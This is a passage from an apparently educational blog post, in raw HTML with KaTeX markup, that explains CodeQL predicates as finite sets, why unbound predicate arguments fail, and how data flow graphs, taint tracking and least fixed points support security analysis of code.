class="minner">⋯</span><span class="mspace" style="margin-right:0.1667em"></span><span class="mspace" style="margin-right:0.1667em"></span><span class="mpunct">,</span><span class="mspace" style="margin-right:0.1667em"></span><span class="mord"><span class="mord mathnormal">d</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.1514em"><span style="top:-2.55em;margin-left:0em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">n</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span><span class="mclose">}</span></span></span></span> where <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>n</mi></mrow><annotation encoding="application/x-tex">n</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.4306em"></span><span class="mord mathnormal">n</span></span></span></span> is finite.</p>
<p>We have introduced a predicate <code>sumsTo42</code> that takes two <code>Expr</code> objects and checks if their integer values sum to 42.</p>
<p>Let:</p>
<ul>
<li><span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>E</mi><mo>⊆</mo><mi>D</mi><mo>=</mo><mo stretchy="false">{</mo><mi>e</mi><mo>∈</mo><mi>D</mi><mo>∣</mo><mi>e</mi><mtext>&nbsp;instanceof&nbsp;Expr</mtext><mo stretchy="false">}</mo></mrow><annotation encoding="application/x-tex">E \subseteq D = \{e \in D \mid e \text{ instanceof Expr}\}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.8193em;vertical-align:-0.136em"></span><span class="mord mathnormal" style="margin-right:0.05764em">E</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⊆</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:0.6833em"></span><span class="mord mathnormal" style="margin-right:0.02778em">D</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em"></span><span class="mopen">{</span><span class="mord mathnormal">e</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">∈</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em"></span><span class="mord mathnormal" style="margin-right:0.02778em">D</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">∣</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em"></span><span class="mord mathnormal">e</span><span class="mord text"><span class="mord">&nbsp;instanceof&nbsp;Expr</span></span><span class="mclose">}</span></span></span></span>.</li>
<li><span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>C</mi><mo>⊆</mo><mi>D</mi><mo>=</mo><mo stretchy="false">{</mo><mi>c</mi><mo>∈</mo><mi>D</mi><mo>∣</mo><mi>c</mi><mtext>&nbsp;instanceof&nbsp;ConstantExpr</mtext><mo stretchy="false">}</mo></mrow><annotation encoding="application/x-tex">C \subseteq D = \{c \in D \mid c \text{ instanceof ConstantExpr}\}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.8193em;vertical-align:-0.136em"></span><span class="mord mathnormal" style="margin-right:0.07153em">C</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⊆</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:0.6833em"></span><span class="mord mathnormal" style="margin-right:0.02778em">D</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em"></span><span class="mopen">{</span><span class="mord mathnormal">c</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">∈</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em"></span><span class="mord mathnormal" style="margin-right:0.02778em">D</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">∣</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em"></span><span class="mord mathnormal">c</span><span class="mord text"><span class="mord">&nbsp;instanceof&nbsp;ConstantExpr</span></span><span class="mclose">}</span></span></span></span>.</li>
</ul>
<p>Then, the predicate <code>sumsTo42</code> evaluates to a set of two-tuples:</p>
<span class="katex-display"><span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML" display="block"><semantics><mrow><mi>P</mi><mo>=</mo><mo stretchy="false">{</mo><mo stretchy="false">(</mo><mi>x</mi><mo separator="true">,</mo><mi>y</mi><mo stretchy="false">)</mo><mo>∈</mo><mi>E</mi><mo>×</mo><mi>E</mi><mo>∣</mo><mo stretchy="false">(</mo><mo stretchy="false">(</mo><mi>x</mi><mo separator="true">,</mo><mi>y</mi><mo stretchy="false">)</mo><mo>∈</mo><mi>C</mi><mo>×</mo><mi>C</mi><mo stretchy="false">)</mo><mo>∧</mo><mo stretchy="false">(</mo><mi>x</mi><mo>+</mo><mi>y</mi><mo>=</mo><mn>42</mn><mo stretchy="false">)</mo><mo stretchy="false">}</mo></mrow><annotation encoding="application/x-tex">P = \{(x, y) \in E \times E \mid ((x, y) \in C \times C) \land (x + y = 42)\}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6833em"></span><span class="mord mathnormal" style="margin-right:0.13889em">P</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em"></span><span class="mopen">{(</span><span class="mord mathnormal">x</span><span class="mpunct">,</span><span class="mspace" style="margin-right:0.1667em"></span><span class="mord mathnormal" style="margin-right:0.03588em">y</span><span class="mclose">)</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">∈</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:0.7667em;vertical-align:-0.0833em"></span><span class="mord mathnormal" style="margin-right:0.05764em">E</span><span class="mspace" style="margin-right:0.2222em"></span><span class="mbin">×</span><span class="mspace" style="margin-right:0.2222em"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em"></span><span class="mord mathnormal" style="margin-right:0.05764em">E</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">∣</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em"></span><span class="mopen">((</span><span class="mord mathnormal">x</span><span class="mpunct">,</span><span class="mspace" style="margin-right:0.1667em"></span><span class="mord mathnormal" style="margin-right:0.03588em">y</span><span class="mclose">)</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">∈</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:0.7667em;vertical-align:-0.0833em"></span><span class="mord mathnormal" style="margin-right:0.07153em">C</span><span class="mspace" style="margin-right:0.2222em"></span><span class="mbin">×</span><span class="mspace" style="margin-right:0.2222em"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em"></span><span class="mord mathnormal" style="margin-right:0.07153em">C</span><span class="mclose">)</span><span class="mspace" style="margin-right:0.2222em"></span><span class="mbin">∧</span><span class="mspace" style="margin-right:0.2222em"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em"></span><span class="mopen">(</span><span class="mord mathnormal">x</span><span class="mspace" style="margin-right:0.2222em"></span><span class="mbin">+</span><span class="mspace" style="margin-right:0.2222em"></span></span><span class="base"><span class="strut" style="height:0.625em;vertical-align:-0.1944em"></span><span class="mord mathnormal" style="margin-right:0.03588em">y</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em"></span><span class="mord">42</span><span class="mclose">)}</span></span></span></span></span>
<p>Now, the <code>from</code> clause binds the variables <code>x</code> and <code>y</code> to the set of all <code>Expr</code> objects in the database, i.e. <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>E</mi></mrow><annotation encoding="application/x-tex">E</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6833em"></span><span class="mord mathnormal" style="margin-right:0.05764em">E</span></span></span></span>. The <code>where</code> clause then filters this set to
only include those tuples that satisfy the predicate <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>P</mi></mrow><annotation encoding="application/x-tex">P</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6833em"></span><span class="mord mathnormal" style="margin-right:0.13889em">P</span></span></span></span>. The result is</p>
<span class="katex-display"><span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML" display="block"><semantics><mrow><mo stretchy="false">{</mo><mo stretchy="false">(</mo><mi>x</mi><mo separator="true">,</mo><mi>y</mi><mo stretchy="false">)</mo><mo>∈</mo><mi>E</mi><mo>×</mo><mi>E</mi><mo>∣</mo><mo stretchy="false">(</mo><mi>x</mi><mo separator="true">,</mo><mi>y</mi><mo stretchy="false">)</mo><mo>∈</mo><mi>P</mi><mo stretchy="false">}</mo></mrow><annotation encoding="application/x-tex">\{(x, y) \in E \times E \mid (x, y) \in P\}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em"></span><span class="mopen">{(</span><span class="mord mathnormal">x</span><span class="mpunct">,</span><span class="mspace" style="margin-right:0.1667em"></span><span class="mord mathnormal" style="margin-right:0.03588em">y</span><span class="mclose">)</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">∈</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:0.7667em;vertical-align:-0.0833em"></span><span class="mord mathnormal" style="margin-right:0.05764em">E</span><span class="mspace" style="margin-right:0.2222em"></span><span class="mbin">×</span><span class="mspace" style="margin-right:0.2222em"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em"></span><span class="mord mathnormal" style="margin-right:0.05764em">E</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">∣</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em"></span><span class="mopen">(</span><span class="mord mathnormal">x</span><span class="mpunct">,</span><span class="mspace" style="margin-right:0.1667em"></span><span class="mord mathnormal" style="margin-right:0.03588em">y</span><span class="mclose">)</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">∈</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em"></span><span class="mord mathnormal" style="margin-right:0.13889em">P</span><span class="mclose">}</span></span></span></span></span>
<p>Notice that the predicate <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>P</mi></mrow><annotation encoding="application/x-tex">P</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6833em"></span><span class="mord mathnormal" style="margin-right:0.13889em">P</span></span></span></span> is a finite set, because its arguments are of a finite type! (<code>Expr</code> refers to the finite set of all expressions in the CodeQL database.)
Because the query results rely on checking for membership in predicate sets, all predicates must evaluate to a finite set — otherwise it's impossible to evaluate
the query in finite time.</p>
<p>For example, this query won't work:</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="codeql" data-theme="github-dark-dimmed"><code data-language="codeql" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#F47067">import</span><span style="color:#F69D50"> javascript</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#F47067">predicate</span><span style="color:#DCBDFB"> sumsTo42</span><span style="color:#ADBAC7">(</span><span style="color:#F47067">int</span><span style="color:#F69D50"> x</span><span style="color:#ADBAC7">, </span><span style="color:#F47067">int</span><span style="color:#F69D50"> y</span><span style="color:#ADBAC7">) { x </span><span style="color:#F47067">+</span><span style="color:#ADBAC7"> y </span><span style="color:#F47067">=</span><span style="color:#6CB6FF"> 42</span><span style="color:#ADBAC7"> }</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#F47067">from</span><span style="color:#F69D50"> Expr</span><span style="color:#F69D50"> x</span><span style="color:#ADBAC7">, </span><span style="color:#F69D50">Expr</span><span style="color:#F69D50"> y</span></span>
<span data-line=""><span style="color:#F47067">where</span></span>
<span data-line=""><span style="color:#ADBAC7">  x </span><span style="color:#F47067">instanceof</span><span style="color:#F69D50"> ConstantExpr</span><span style="color:#F47067"> and</span></span>
<span data-line=""><span style="color:#ADBAC7">  y </span><span style="color:#F47067">instanceof</span><span style="color:#F69D50"> ConstantExpr</span><span style="color:#F47067"> and</span></span>
<span data-line=""><span style="color:#DCBDFB">  sumsTo42</span><span style="color:#ADBAC7">(x.</span><span style="color:#DCBDFB">getIntValue</span><span style="color:#ADBAC7">(), y.</span><span style="color:#DCBDFB">getIntValue</span><span style="color:#ADBAC7">())</span></span>
<span data-line=""><span style="color:#F47067">select</span><span style="color:#ADBAC7"> x, y</span></span></code></pre></figure>
<p>because the predicate arguments aren't bound! Clearly, <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>x</mi></mrow><annotation encoding="application/x-tex">x</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.4306em"></span><span class="mord mathnormal">x</span></span></span></span> is bound iff <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>y</mi></mrow><annotation encoding="application/x-tex">y</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.625em;vertical-align:-0.1944em"></span><span class="mord mathnormal" style="margin-right:0.03588em">y</span></span></span></span> is bound, and vice versa. Since there are no other operators in the predicate
that could bind either variable, the predicate is not well-defined (attempting to evaluate an infinite subset of <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi mathvariant="double-struck">Z</mi><mo>×</mo><mi mathvariant="double-struck">Z</mi></mrow><annotation encoding="application/x-tex">\mathbb{Z} \times \mathbb{Z}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.7722em;vertical-align:-0.0833em"></span><span class="mord mathbb">Z</span><span class="mspace" style="margin-right:0.2222em"></span><span class="mbin">×</span><span class="mspace" style="margin-right:0.2222em"></span></span><span class="base"><span class="strut" style="height:0.6889em"></span><span class="mord mathbb">Z</span></span></span></span>) and the
compiler will helpfully throw an error.</p>
<h2>Data flow analysis and taint tracking</h2>
<p>The real power of CodeQL lies in its ability to track data flow through a codebase. This is particularly useful for security analysis,
where one might want to find out how user input flows through the system and ends up in a dangerous place.</p>
<p>To do this, CodeQL constructs a data flow graph that represents how data flows through the code (e.g. passed between variables, functions, and expressions).
Note that this is not the same as an abstract syntax tree, which represents the syntactic structure of the code. Here's an example:</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="javascript" data-theme="github-dark-dimmed"><code data-language="javascript" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#F47067">function</span><span style="color:#DCBDFB"> foo</span><span style="color:#ADBAC7">(</span><span style="color:#F69D50">p</span><span style="color:#ADBAC7">) {</span></span>
<span data-line=""><span style="color:#F47067">  let</span><span style="color:#ADBAC7"> x </span><span style="color:#F47067">=</span><span style="color:#6CB6FF"> 0</span></span>
<span data-line=""><span style="color:#F47067">  if</span><span style="color:#ADBAC7"> (p) {</span></span>
<span data-line=""><span style="color:#ADBAC7">    x </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> p.f</span></span>
<span data-line=""><span style="color:#ADBAC7">  }</span></span>
<span data-line=""><span style="color:#F47067">  return</span><span style="color:#ADBAC7"> x</span></span>
<span data-line=""><span style="color:#ADBAC7">}</span></span></code></pre></figure>
<figure class="mx-auto"><img alt="Data flow graph for a simple JavaScript program" loading="lazy" width="1108" height="408" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fdfg.6c89f278.png&amp;w=1200&amp;q=75 1x, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fdfg.6c89f278.png&amp;w=3840&amp;q=75 2x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fdfg.6c89f278.png&amp;w=3840&amp;q=75"><figcaption class="text-center">Data flow graph for a simple JavaScript program</figcaption></figure>
<p>Notice how the assignments are represented as <em>edges</em>, and the conditionals are not present in the graph. We don't care that <code>x</code> is <code>0</code> if <code>p</code> is falsy —
we just need to know that <code>x</code> has possible values of <code>0</code> and <code>p.f</code>.</p>
<p>Taint tracking takes it a step further by marking certain data as "tainted", and propagating this through derived data. For example, if <code>y = foo(p)</code>,
and <code>p</code> is tainted, then <code>y</code> is also tainted, because it derives from <code>p</code>. This makes sense when analysing bugs and vulnerabilities, because if <code>p</code> is untrusted
user input, then <code>y</code> must also be treated as untrusted.</p>
<p>This is a fundamentally recursive task: given some propagation rules that determine whether the result of some operation, given tainted inputs, is also tainted,
explore the program's control flow until no more tainted data can be found.</p>
<p>In other words, find <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover><mo>=</mo><mi>F</mi><mo stretchy="false">(</mo><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover><mo stretchy="false">)</mo></mrow><annotation encoding="application/x-tex">\overline{X}=F(\overline{X})</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.8833em"></span><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1.1333em;vertical-align:-0.25em"></span><span class="mord mathnormal" style="margin-right:0.13889em">F</span><span class="mopen">(</span><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="mclose">)</span></span></span></span> where <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover></mrow><annotation encoding="application/x-tex">\overline{X}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.8833em"></span><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span></span></span></span> is a vector of "In's" and "Out's" representing the set of variables tainted before and after
each statement, and <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>F</mi></mrow><annotation encoding="application/x-tex">F</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6833em"></span><span class="mord mathnormal" style="margin-right:0.13889em">F</span></span></span></span> is a function that applies the propagation rules. We want the <strong>least fixed point</strong>, i.e. the smallest <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover></mrow><annotation encoding="application/x-tex">\overline{X}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.8833em"></span><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span></span></span></span> such that <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover><mo>=</mo><mi>F</mi><mo stretchy="false">(</mo><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover><mo stretchy="false">)</mo></mrow><annotation encoding="application/x-tex">\overline{X}=F(\overline{X})</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.8833em"></span><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1.1333em;vertical-align:-0.25em"></span><span class="mord mathnormal" style="margin-right:0.13889em">F</span><span class="mopen">(</span><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="mclose">)</span></span></span></span>.</p>
<p>A partial order is a relation that is reflexive, transitive, and antisymmetric. We can define a partial order among vectors of sets:</p>
<span class="katex-display"><span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML" display="block"><semantics><mtable rowspacing="0.25em" columnalign="right" columnspacing=""><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover><mo>⊑</mo><mover accent="true"><msup><mi>X</mi><mo mathvariant="normal" lspace="0em" rspace="0em">′</mo></msup><mo stretchy="true">‾</mo></mover><mtext>  </mtext><mo>⟺</mo><mtext>  </mtext><mi mathvariant="normal">∀</mi><mi>i</mi><mo>⋅</mo><msub><mi>X</mi><mi>i</mi></msub><mo>⊆</mo><msubsup><mi>X</mi><mi>i</mi><mo mathvariant="normal" lspace="0em" rspace="0em">′</mo></msubsup></mrow></mstyle></mtd></mtr></mtable><annotation encoding="application/x-tex">\begin{align*}
\overline{X} \sqsubseteq \overline{X'} \iff \forall i \cdot X_i \subseteq X'_i
\end{align*}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1.5433em;vertical-align:-0.5217em"></span><span class="mord"><span class="mtable"><span class="col-align-r"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:1.0217em"><span style="top:-3.1383em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⊑</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.6779em"><span style="top:-2.989em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">′</span></span></span></span></span></span></span></span></span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⟺</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mord">∀</span><span class="mord mathnormal">i</span><span class="mspace" style="margin-right:0.2222em"></span><span class="mbin">⋅</span><span class="mspace" style="margin-right:0.2222em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3117em"><span style="top:-2.55em;margin-left:-0.0785em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⊆</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.8019em"><span style="top:-2.453em;margin-left:-0.0785em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span><span style="top:-3.113em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">′</span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.247em"><span></span></span></span></span></span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.5217em"><span></span></span></span></span></span></span></span></span></span></span></span>
<p>It's easy to see that this is a partial order: it is reflexive (since <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><msub><mi>X</mi><mi>i</mi></msub><mo>⊆</mo><msub><mi>X</mi><mi>i</mi></msub></mrow><annotation encoding="application/x-tex">X_i \subseteq X_i</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.8333em;vertical-align:-0.15em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3117em"><span style="top:-2.55em;margin-left:-0.0785em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⊆</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:0.8333em;vertical-align:-0.15em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3117em"><span style="top:-2.55em;margin-left:-0.0785em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span></span></span></span>), transitive (since <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><msub><mi>X</mi><mi>i</mi></msub><mo>⊆</mo><msubsup><mi>X</mi><mi>i</mi><mo mathvariant="normal" lspace="0em" rspace="0em">′</mo></msubsup><mo>∧</mo><msubsup><mi>X</mi><mi>i</mi><mo mathvariant="normal" lspace="0em" rspace="0em">′</mo></msubsup><mo>⊆</mo><msubsup><mi>X</mi><mi>i</mi><mrow><mo mathvariant="normal">′</mo><mo mathvariant="normal">′</mo></mrow></msubsup><mtext>  </mtext><mo>⟹</mo><mtext>  </mtext><msub><mi>X</mi><mi>i</mi></msub><mo>⊆</mo><msubsup><mi>X</mi><mi>i</mi><mrow><mo mathvariant="normal">′</mo><mo mathvariant="normal">′</mo></mrow></msubsup></mrow><annotation encoding="application/x-tex">X_i \subseteq X'_i \land X'_i \subseteq X''_i \implies X_i \subseteq X''_i</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" 